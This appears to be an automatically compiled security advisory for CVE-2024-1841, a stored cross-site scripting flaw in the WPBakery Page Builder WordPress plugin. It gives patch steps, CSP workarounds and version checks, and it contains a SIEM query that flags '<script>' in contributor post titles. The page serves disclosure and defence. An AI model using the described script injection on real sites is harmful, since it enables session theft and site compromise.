CVE-2024-1841
📋 TL;DR
The WPBakery Page Builder WordPress plugin has a stored cross-site scripting vulnerability in versions up to 7.5. Authenticated attackers with contributor-level access or higher can inject malicious scripts into post titles, which execute when users view affected pages. This affects all WordPress sites using vulnerable versions of the plugin.
💻 Affected Systems
- WPBakery Page Builder WordPress Plugin
📦 What is this software?
Page Builder by Wpbakery
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, redirect users to malicious sites, deface websites, or install backdoors leading to complete site compromise.
Likely Case
Attackers inject malicious scripts to steal user session cookies, redirect visitors to phishing sites, or display unwanted content.
If Mitigated
With proper user role management and content filtering, impact is limited to unauthorized content modification within contributor-level permissions.
🎯 Exploit Status
Exploitation requires authenticated access with contributor privileges or higher. Attack vectors are well-documented in security advisories.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7.6 or later
Vendor Advisory: https://kb.wpbakery.com/docs/preface/release-notes/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find WPBakery Page Builder. 4. Click 'Update Now' if available. 5. Alternatively, download version 7.6+ from wpbakery.com and upload via FTP.
🔧 Temporary Workarounds
Restrict User Roles
allLimit contributor-level access to trusted users only and implement principle of least privilege.
Content Security Policy
allImplement CSP headers to restrict script execution sources.
Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Add to wp-config.php: header("Content-Security-Policy: default-src 'self'");
🧯 If You Can't Patch
- Disable WPBakery plugin temporarily until patched
- Remove contributor role access for untrusted users
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → WPBakery Page Builder → Version. If version is 7.5 or lower, you are vulnerable.Check Version:
wp plugin get wpbakery-page-builder --field=versionVerify Fix Applied:
After update, verify WPBakery version is 7.6 or higher in WordPress plugins page.📡 Detection & Monitoring
Log Indicators:
- Unusual post title modifications by contributor users
- Script tags in post_title database fields
- Multiple failed login attempts followed by post edits
Network Indicators:
- External script loads from post content
- Unusual outbound connections after page views
SIEM Query:
source="wordpress.log" AND (event="post_updated" OR event="wp_insert_post") AND user_role="contributor" AND title CONTAINS "<script>"🔗 References
- https://kb.wpbakery.com/docs/preface/release-notes/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/34d21418-4faf-40bf-a960-79482a592722?source=cve
- https://kb.wpbakery.com/docs/preface/release-notes/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/34d21418-4faf-40bf-a960-79482a592722?source=cve
